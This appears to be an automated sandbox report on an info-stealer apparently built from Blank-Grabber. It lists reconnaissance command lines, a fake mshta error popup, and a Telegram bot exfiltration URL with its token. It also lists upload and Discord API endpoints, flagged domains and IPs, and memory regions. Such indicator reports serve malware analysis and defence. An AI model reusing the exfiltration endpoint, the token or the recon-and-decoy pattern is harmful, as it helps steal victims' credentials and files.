C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
C:\Windows\System32\wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic os get Caption
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 110 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.telegram.org/bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument
149.154.167.220
malicious
https://duckduckgo.com/chrome_newtab
unknown
https://github.com/Blank-c/BlankOBF
unknown
https://api.telegram.org/bot%s/%s
unknown
https://www.avito.ru/
unknown
https://duckduckgo.com/ac/?q=
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
unknown
https://github.com/Blank-c/Blank-Grabberi
unknown
https://www.ctrip.com/
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
unknown
https://python.org/dev/peps/pep-0263/
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
https://www.leboncoin.fr/
unknown
https://tools.ietf.org/html/rfc2388#section-4.4
unknown
https://weibo.com/
unknown
https://api.anonfiles.com/upload
unknown
https://www.msn.com
unknown
https://nuget.org/nuget.exe
unknown
https://discord.com/api/v9/users/
unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
unknown
https://www.reddit.com/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.amazon.ca/
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
unknown
https://www.ebay.co.uk/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://www.ebay.de/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
unknown
https://go.micro
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
unknown
https://www.amazon.com/
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://httpbin.org/
unknown
http://crl.ver)
unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://www.youtube.com/
unknown
https://allegro.pl/
unknown
https://github.com/Pester/Pester
unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
unknown
https://MD8.mozilla.org/1/m
unknown
http://ocsp.sectigo.com0$
unknown
https://www.bbc.co.uk/
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
http://ip-api.com/line/?fields=hostingr
unknown
https://bugzilla.mo
unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3
unknown
https://api.telegram.org/bot%s/%s)
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
http://logo.veWALLET~2.JS
unknown
https://google.com/mail
unknown
http://logo.veANIFE~1JSO
unknown
https://packaging.python.org/specifications/entry-points/
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
unknown
http://logo.ve
unknown
https://www.google.com/
unknown
https://www.iqiyi.com/
unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539
unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
unknown
http://google.com/
unknown
https://api.gofile.io/getServerr
unknown
http://ocsp.sectigo.com0
unknown
http://logo.veW
unknown
https://www.python.org/download/releases/2.3/mro/.
unknown
https://contoso.com/License
unknown
https://discordapp.com/api/v9/users/
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
unknown
http://ip-api.com/json/?fields=225545r
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
unknown
https://github.com/urllib3/urllib3/issues/2920
unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
unknown
http://crl.sectigo.j$
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
unknown
https://yahoo.com/
unknown
https://account.bellmedia.c
unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
unknown
https://login.microsoftonline.com
unknown
http://cacerts.digicert.co
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
https://html.spec.whatwg.org/multipage/
unknown
https://www.ifeng.com/
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
unknown
https://www.zhihu.com/
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://www.rfc-editor.org/rfc/rfc8259#section-8.1
unknown
https://contoso.com/
unknown
https://oneget.orgX
unknown
https://github.com/Unidata/MetPy/bl
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
malicious
api.telegram.org
149.154.167.220
malicious
blank-a0m8c.in
unknown
malicious

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
1280x1024x32(BGR 0)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\mlang.dll,-4387
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\mlang.dll,-4407

Memdumps

Base Address
Regiontype
Protect
Malicious
1FC253C8000
heap
page read and write
malicious
1EA23124000
heap
page read and write
malicious
1FC25070000
direct allocation
page read and write
malicious
1FC22CD0000
heap
page read and write
malicious
1FC253A0000
heap
page read and write
malicious
1EA23122000
heap
page read and write
malicious
1FC25CB1000
heap
page read and write
malicious
2484A17D000
heap
page read and write
267AA9DD000
trusted library allocation
page read and write
1C55079F000
heap
page read and write
23AC5C10000
heap
page read and write
1FC25307000
heap
page read and write
6C0855F000
stack
page read and write
239FE7A3000
heap
page read and write
1FC2560E000
heap
page read and write
23195EE0000
heap
page read and write
2322B3D0000
heap
page read and write
7D446FC000
stack
page read and write
23AC5B43000
heap
page read and write
24BA3B40000
heap
page read and write
1407BA00000
heap
page read and write
1E0D6453000
heap
page read and write
1E0E1617000
heap
page read and write
23AC5B49000
heap
page read and write
29AC2260000
heap
page read and write
1FC2560E000
heap
page read and write
1DD0FA83000
heap
page read and write
23AC79EE000
heap
page read and write
1FC264D0000
trusted library allocation
page read and write
1C5507A3000
heap
page read and write
2484A169000
heap
page read and write
7FFAA96B0000
trusted library allocation
page read and write
7FFAA94A0000
trusted library allocation
page execute and read and write
1BCD1065000
heap
page read and write
267AA7B5000
trusted library allocation
page read and write
1FC2527D000
heap
page read and write
1FC25566000
heap
page read and write
1E0E2FB1000
heap
page read and write
1C550067000
heap
page read and write
1F52B8B4000
heap
page read and write
7FFAA9740000
trusted library allocation
page read and write
266F30A2000
heap
page read and write
281FE171000
heap
page read and write
7FFB0BF69000
unkown
page execute and read and write
1575D3C000
stack
page read and write
26379E50000
heap
page read and write
267B9409000
trusted library allocation
page read and write
1E0D9A80000
direct allocation
page read and write
1E0E15FA000
heap
page read and write
7FFB0BB55000
unkown
page execute and read and write
23DC3E72000
heap
page read and write
267AAF0F000
trusted library allocation
page read and write
1C55012B000
heap
page read and write
7FFB1AB18000
unkown
page read and write
1FC252EE000
heap
page read and write
8252B6F000
stack
page read and write
1CEF207B000
heap
page read and write
2422BD35000
heap
page read and write
1FC256B8000
heap
page read and write
22973190000
heap
page read and write
1E8E34F5000
trusted library allocation
page read and write
1E8E4052000
heap
page read and write
2484A7F9000
heap
page read and write
2484A107000
heap
page read and write
1FC25558000
heap
page read and write
1FC24F48000
heap
page read and write
22972EAD000
heap
page read and write
13C876A1000
heap
page read and write
1700B89B000
heap
page read and write
7FF74EE71000
unkown
page execute read
1E8E352F000
trusted library allocation
page read and write
1FC25C60000
direct allocation
page read and write
281FC357000
heap
page read and write
270D27B2000
heap
page read and write
1A2CE4E4000
heap
page read and write
1A2CE3D0000
heap
page read and write
2484A7E7000
heap
page read and write
6C085DF000
stack
page read and write
1FC25CB0000
heap
page read and write
1DD0C7AD000
heap
page read and write
270D222F000
heap
page read and write
1FC256AA000
heap
page read and write
C68552C000
stack
page read and write
1FC25635000
heap
page read and write
1C550127000
heap
page read and write
22973194000
heap
page read and write
1690FA04000
heap
page read and write
281FC150000
heap
page read and write
15776FE000
unkown
page readonly
23AC6132000
heap
page read and write
D7419FF000
stack
page read and write
1E0E15F7000
heap
page read and write
1E5FA77A000
heap
page read and write
7FFAA93AC000
trusted library allocation
page execute and read and write
1E0D64B7000
heap
page read and write
267B9419000
trusted library allocation
page read and write
1E8E3FEC000
heap
page read and write
20D43AFC000
heap
page read and write
281FE177000
heap
page read and write
1FC26164000
heap
page read and write
2484A160000
heap
page read and write
1FC25675000
heap
page read and write
1CEF2085000
heap
page read and write
1407CA80000
trusted library allocation
page read and write
1E0E15B6000
heap
page read and write
26A1C54B000
heap
page read and write
24BA3C94000
heap
page read and write
23AC60FB000
heap
page read and write
76BC4C7000
stack
page read and write
1407C140000
trusted library section
page readonly
1FC255F3000
heap
page read and write
1E0E1592000
heap
page read and write
CC931FF000
stack
page read and write
1CEF2598000
heap
page read and write
6089C8B000
stack
page read and write
7FFAA9700000
trusted library allocation
page read and write
1FC256A9000
heap
page read and write
1E0D99C0000
direct allocation
page read and write
23AC79F6000
heap
page read and write
1FC25614000
heap
page read and write
202E5860000
heap
page read and write
19DD4F11000
heap
page read and write
266F3150000
trusted library allocation
page read and write
1FC255A7000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
1CEF3F7F000
heap
page read and write
1FC25F8A000
heap
page read and write
1FC25330000
heap
page read and write
81D267F000
stack
page read and write
1407C730000
trusted library allocation
page read and write
135F05F9000
heap
page read and write
7FFAA96C2000
trusted library allocation
page read and write
23AC5B41000
heap
page read and write
1FC22D70000
heap
page read and write
23AC5B4F000
heap
page read and write
7FFAA9600000
trusted library allocation
page read and write
1CEF2058000
heap
page read and write
1FC255D6000
heap
page read and write
239E8054000
trusted library allocation
page read and write
1AD18B19000
heap
page read and write
1E0D6476000
heap
page read and write
9A8647F000
stack
page read and write
1909D570000
heap
page read and write
1E0E15D6000
heap
page read and write
23195EC0000
heap
page read and write
1DD0FA14000
heap
page read and write
7FFB0D721000
unkown
page execute read
24B86961000
heap
page read and write
7FFAA97B0000
trusted library allocation
page read and write
24BA3C90000
heap
page read and write
65B07FF000
unkown
page read and write
1E8E3FD4000
heap
page read and write
2BA38AD0000
heap
page read and write
27EA9BB0000
heap
page read and write
7FFB0B889000
unkown
page execute and read and write
1407B2A0000
heap
page read and write
1E0D9BA9000
direct allocation
page read and write
1FC255A2000
heap
page read and write
7D448FF000
stack
page read and write
1FC22E60000
heap
page read and write
270D4041000
heap
page read and write
1CEF258C000
heap
page read and write
825259F000
stack
page read and write
135F0804000
heap
page read and write
1FC25D27000
heap
page read and write
20D43ADB000
heap
page read and write
1E8E41E0000
heap
page read and write
1FC255C1000
heap
page read and write
21B1BE80000
heap
page read and write
1FC25652000
heap
page read and write
267C16CA000
heap
page read and write
266F4F5F000
heap
page read and write
281FC33F000
heap
page read and write
1E0D9B00000
direct allocation
page read and write
51D413F000
stack
page read and write
270D2224000
heap
page read and write
1FC25622000
heap
page read and write
1E0D64B7000
heap
page read and write
1C55028B000
heap
page read and write
2422BD00000
heap
page read and write
1576AFB000
stack
page read and write
7FFB0C291000
unkown
page execute read
266F3098000
heap
page read and write
16533734000
heap
page read and write
1E0D9980000
direct allocation
page read and write
1FC2553F000
heap
page read and write
1FC25BBF000
heap
page read and write
23195FBB000
heap
page read and write
1CEF268A000
heap
page read and write
2484A118000
heap
page read and write
20D43AFC000
heap
page read and write
1407B25B000
heap
page read and write
1E0E1596000
heap
page read and write
1E8E34F9000
trusted library allocation
page read and write
2484A157000
heap
page read and write
266F36A7000
heap
page read and write
1FC26124000
heap
page read and write
7FFB0C441000
unkown
page execute and read and write
1E0E15F1000
heap
page read and write
D8D52FC000
stack
page read and write
267AA2A5000
trusted library allocation
page read and write
1407C770000
trusted library allocation
page read and write
1E8E34F3000
trusted library allocation
page read and write
1FC22D3E000
heap
page read and write
1FC255F7000
heap
page read and write
1E0D9960000
direct allocation
page read and write
1F52B830000
heap
page read and write
266F30A2000
heap
page read and write
1E0E15FA000
heap
page read and write
7FFB0C291000
unkown
page execute read
544A6FE000
stack
page read and write
D8D54FF000
stack
page read and write
1CEF258C000
heap
page read and write
7FFB0BFE1000
unkown
page execute and read and write
281FC270000
trusted library allocation
page read and write
1FC2536E000
heap
page read and write
27EA9A82000
heap
page read and write
2484A457000
heap
page read and write
1E8E4640000
heap
page read and write
CC930FF000
unkown
page read and write
266F4F65000
heap
page read and write
266F36D9000
heap
page read and write
7FFB0BB68000
unkown
page read and write
81CDFFF000
stack
page read and write
2BA38B00000
heap
page read and write
266F36A0000
heap
page read and write
7FFB1E4CA000
unkown
page execute and write copy
1CE587D1000
heap
page read and write
4B74FFF000
stack
page read and write
26395B20000
heap
page read and write
7DF448C90000
trusted library allocation
page execute and read and write
1CEF2685000
heap
page read and write
1FC255D6000
heap
page read and write
27EA9A60000
heap
page read and write
239FEC40000
trusted library section
page read and write
24BA3992000
heap
page read and write
1FC252EE000
heap
page read and write
51D46F9000
stack
page read and write
1FC255A3000
heap
page read and write
1FC24F48000
heap
page read and write
7FFAA9570000
trusted library allocation
page read and write
267A78B0000
heap
page read and write
1DD0FA82000
heap
page read and write
1FC255C1000
heap
page read and write
1CEF2097000
heap
page read and write
1E0D9A20000
direct allocation
page read and write
1DD103F6000
heap
page read and write
7FFAA96F0000
trusted library allocation
page read and write
1C550127000
heap
page read and write
270D27C9000
heap
page read and write
27EA9A6B000
heap
page read and write
1FC252A7000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
270D27C9000
heap
page read and write
1FC22D6C000
heap
page read and write
7FFAA9660000
trusted library allocation
page read and write
7FFB1AB16000
unkown
page execute and write copy
29AC2490000
heap
page read and write
1FC25523000
heap
page read and write
1FC24EDE000
heap
page read and write
1FC255D2000
heap
page read and write
23097D32000
heap
page read and write
281FE17E000
heap
page read and write
7FFB0C5E9000
unkown
page execute and write copy
266F3074000
heap
page read and write
267A779B000
heap
page read and write
81D232B000
stack
page read and write
1FC26160000
heap
page read and write
7FFB0C2B2000
unkown
page readonly
76BB778000
stack
page read and write
1E8E34F6000
trusted library allocation
page read and write
7FFB0C2B5000
unkown
page readonly
1C550799000
heap
page read and write
281FE17E000
heap
page read and write
2364087F000
heap
page read and write
1E8E3FF2000
heap
page read and write
1AD18C10000
heap
page read and write
1FC25560000
heap
page read and write
1C550129000
heap
page read and write
1FC2526D000
heap
page read and write
26395B50000
heap
page read and write
2584DAE0000
heap
page read and write
1FC253B7000
heap
page read and write
6089D8F000
stack
page read and write
16533605000
heap
page read and write
23097D42000
heap
page read and write
1E8E41E0000
heap
page read and write
23195FD2000
heap
page read and write
7FFB0C2A6000
unkown
page readonly
2484A45A000
heap
page read and write
270D2183000
heap
page read and write
7FFB0BA5E000
unkown
page execute and read and write
1CEF2058000
heap
page read and write
7FFAA9680000
trusted library allocation
page read and write
1E8E41D8000
heap
page read and write
1C550096000
heap
page read and write
27EA9A6D000
heap
page read and write
23097EF0000
heap
page read and write
1FC25631000
heap
page read and write
17FCF062000
heap
page read and write
266F3068000
heap
page read and write
2090AA84000
heap
page read and write
1FC252B9000
heap
page read and write
17FCF140000
heap
page read and write
1CEF3F86000
heap
page read and write
1E0E14C0000
heap
page read and write
7FFB0B754000
unkown
page execute and read and write
1F52B8CD000
heap
page read and write
281FC412000
heap
page read and write
1FC255D7000
heap
page read and write
270D2237000
heap
page read and write
1FC25554000
heap
page read and write
1FC2561E000
heap
page read and write
1C55012B000
heap
page read and write
2484A450000
heap
page read and write
239FE900000
heap
page read and write
266F36AA000
heap
page read and write
2484A145000
heap
page read and write
1FC24EE2000
heap
page read and write
266F36A2000
heap
page read and write
270D223A000
heap
page read and write
2484A454000
heap
page read and write
1E181D00000
heap
page read and write
236407E0000
heap
page read and write
8F1C1CF000
stack
page read and write
1EA2311F000
heap
page read and write
1AD18B29000
heap
page read and write
1E0E15EE000
heap
page read and write
1DD0F2C8000
heap
page read and write
1DD0E8A4000
heap
page read and write
7FFAA9564000
trusted library allocation
page read and write
1E8E4043000
heap
page read and write
1E0E1622000
heap
page read and write
15766FB000
stack
page read and write
9A769FF000
stack
page read and write
7FFB0C290000
unkown
page readonly
281FC343000
heap
page read and write
24545715000
heap
page read and write
1C550123000
heap
page read and write
24BA3992000
heap
page read and write
2484A7E3000
heap
page read and write
1FC25652000
heap
page read and write
7FFB0BEBD000
unkown
page execute and read and write
1C550760000
heap
page read and write
1E8E41C5000
heap
page read and write
24BA38E0000
heap
page read and write
23AC5B41000
heap
page read and write
7FFAA96E0000
trusted library allocation
page read and write
7FFB0C2B0000
unkown
page read and write
7FFAA9640000
trusted library allocation
page read and write
1CE587D1000
heap
page read and write
2484A15E000
heap
page read and write
1CEF20A0000
heap
page read and write
2484C18E000
heap
page read and write
1FC25562000
heap
page read and write
2B52676B000
heap
page read and write
76BB8FE000
stack
page read and write
1E8E403F000
heap
page read and write
7FFB1E47A000
unkown
page execute and write copy
23AC5B57000
heap
page read and write
2BA9E6E1000
heap
page read and write
1FC251B9000
heap
page read and write
2422BDE8000
heap
page read and write
1E8E3500000
trusted library allocation
page read and write
1BCD0F40000
heap
page read and write
1EA2312C000
heap
page read and write
7FFB0C290000
unkown
page readonly
1700B89D000
heap
page read and write
7FFAA95D0000
trusted library allocation
page read and write
1FC2531C000
heap
page read and write
266F36CF000
heap
page read and write
135F06E0000
heap
page read and write
1DEE7CB4000
heap
page read and write
270D4056000
heap
page read and write
1FC253B0000
heap
page read and write
270D27A7000
heap
page read and write
239FEA57000
heap
page read and write
2940C320000
heap
page read and write
266F4F5F000
heap
page read and write
1FC25675000
heap
page read and write
1C550111000
heap
page read and write
266F3047000
heap
page read and write
7FFB0C2B0000
unkown
page read and write
165335E0000
heap
page read and write
267C163B000
heap
page read and write
244EE0C7000
heap
page read and write
16533605000
heap
page read and write
281FC513000
heap
page read and write
270D2450000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
2BA9E6D9000
heap
page read and write
267A7900000
heap
page read and write
1FC253B0000
heap
page read and write
1E0D646C000
heap
page read and write
1FC2540D000
heap
page read and write
239FE915000
heap
page read and write
7FFB0C2B0000
unkown
page read and write
1FC25558000
heap
page read and write
1FC25601000
heap
page read and write
2484A7FA000
heap
page read and write
7FFAA96A4000
trusted library allocation
page read and write
281FC517000
heap
page read and write
1FC2532D000
heap
page read and write
1FC24E98000
heap
page read and write
1909D515000
heap
page read and write
D7414E8000
stack
page read and write
1A2CE3D0000
heap
page read and write
2484C184000
heap
page read and write
7E41E8C000
stack
page read and write
1E0E15BA000
heap
page read and write
27EA9B60000
heap
page read and write
281FC409000
heap
page read and write
B2B85BE000
stack
page read and write
7FFB0C43D000
unkown
page read and write
1CEF2053000
heap
page read and write
7FFB0C401000
unkown
page execute and write copy
D7415FE000
stack
page read and write
1DCE30DB000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
7FFB0C2A6000
unkown
page readonly
24BA3992000
heap
page read and write
24BA398A000
heap
page read and write
7FFB0D742000
unkown
page readonly
7FFAA9770000
trusted library allocation
page execute and read and write
267B9573000
trusted library allocation
page read and write
7DF416EF0000
trusted library allocation
page execute and read and write
7FFAA9750000
trusted library allocation
page read and write
1FC256BE000
heap
page read and write
2484A170000
heap
page read and write
2422BDF8000
heap
page read and write
24BA3992000
heap
page read and write
19BC6795000
heap
page read and write
2322B380000
heap
page read and write
270D2209000
heap
page read and write
7FFB1E470000
unkown
page readonly
7FFAA9670000
trusted library allocation
page read and write
270D2238000
heap
page read and write
1C550765000
heap
page read and write
D7417FD000
stack
page read and write
1FC25337000
heap
page read and write
1E0E15B4000
heap
page read and write
266F3170000
heap
page read and write
7FFB0C291000
unkown
page execute read
2484A090000
heap
page read and write
1FC252EB000
heap
page read and write
2484A169000
heap
page read and write
21B1BD20000
heap
page read and write
28425E5D000
heap
page read and write
239E7EDA000
trusted library allocation
page read and write
23AC60FA000
heap
page read and write
281FC316000
heap
page read and write
76BB2FE000
stack
page read and write
27EA9BB5000
heap
page read and write
2422BDE0000
heap
page read and write
1FC255C7000
heap
page read and write
7FFAA9384000
trusted library allocation
page read and write
1FC2533A000
heap
page read and write
1E181CE0000
heap
page read and write
1C550062000
heap
page read and write
1FC25451000
heap
page read and write
1E8E3FFB000
heap
page read and write
267A7798000
heap
page read and write
23AC5B41000
heap
page read and write
1FC2555E000
heap
page read and write
1407C7A9000
trusted library allocation
page read and write
1BCD1060000
heap
page read and write
270D27BF000
heap
page read and write
1CEF2097000
heap
page read and write
1E8E3FEB000
heap
page read and write
7FFB0D740000
unkown
page read and write
1FC24EE2000
heap
page read and write
7FF74EF16000
unkown
page read and write
2422BDF8000
heap
page read and write
1FC25616000
heap
page read and write
1E0D6465000
heap
page read and write
1FC2536A000
heap
page read and write
1407C180000
trusted library section
page readonly
23AC5B02000
heap
page read and write
1407B27D000
heap
page read and write
1FC25602000
heap
page read and write
1FC25656000
heap
page read and write
7FFB0BB66000
unkown
page execute and write copy
1E8E3525000
trusted library allocation
page read and write
266F320B000
heap
page read and write
20C72EC4000
heap
page read and write
2322B430000
heap
page read and write
23AC60F0000
heap
page read and write
4B74EFE000
unkown
page read and write
7FFB0C290000
unkown
page readonly
1FC24F2D000
heap
page read and write
1FC2567E000
heap
page read and write
7FFAA93A0000
trusted library allocation
page read and write
7FFAA97A0000
trusted library allocation
page read and write
23AC60F5000
heap
page read and write
1EA2311F000
heap
page read and write
281FC3F8000
heap
page read and write
2322B410000
heap
page read and write
7FFAA9520000
trusted library allocation
page read and write
1C55077C000
heap
page read and write
1407C740000
trusted library allocation
page read and write
267C1904000
heap
page read and write
1CEF2085000
heap
page read and write
1FC253B0000
heap
page read and write
281FC412000
heap
page read and write
239FEA4D000
heap
page read and write
2484A7E5000
heap
page read and write
2484A16A000
heap
page read and write
1DD0FA93000
heap
page read and write
2090A7F0000
heap
page read and write
1407B170000
heap
page read and write
1FC22D29000
heap
page read and write
1A2CE2D0000
heap
page read and write
2484A157000
heap
page read and write
239E47F0000
heap
page read and write
2CFD1BE000
stack
page read and write
266F36E5000
heap
page read and write
1E0D645D000
heap
page read and write
23DC40E0000
heap
page read and write
239E498C000
heap
page read and write
1FC25327000
heap
page read and write
20D43B0B000
heap
page read and write
51D4878000
stack
page read and write
1DD0C760000
heap
page read and write
1FC25554000
heap
page read and write
1E0E1583000
heap
page read and write
1FC25631000
heap
page read and write
1576EFE000
unkown
page readonly
1FC255B2000
heap
page read and write
1DD0C7C4000
heap
page read and write
1E8E4056000
heap
page read and write
1E8E41E0000
heap
page read and write
281FC331000
heap
page read and write
1DD0FAA0000
heap
page read and write
7FFAA95B0000
trusted library allocation
page read and write
1FC2564F000
heap
page read and write
1EA2311C000
heap
page read and write
266F30A2000
heap
page read and write
7FFB0D720000
unkown
page readonly
239E48A6000
heap
page read and write
1FC24F55000
heap
page read and write
244EE040000
heap
page read and write
281FC270000
trusted library allocation
page read and write
1FC24F6A000
heap
page read and write
7FFAA96A0000
trusted library allocation
page read and write
7FF6DC700000
unkown
page readonly
1CB96E20000
heap
page read and write
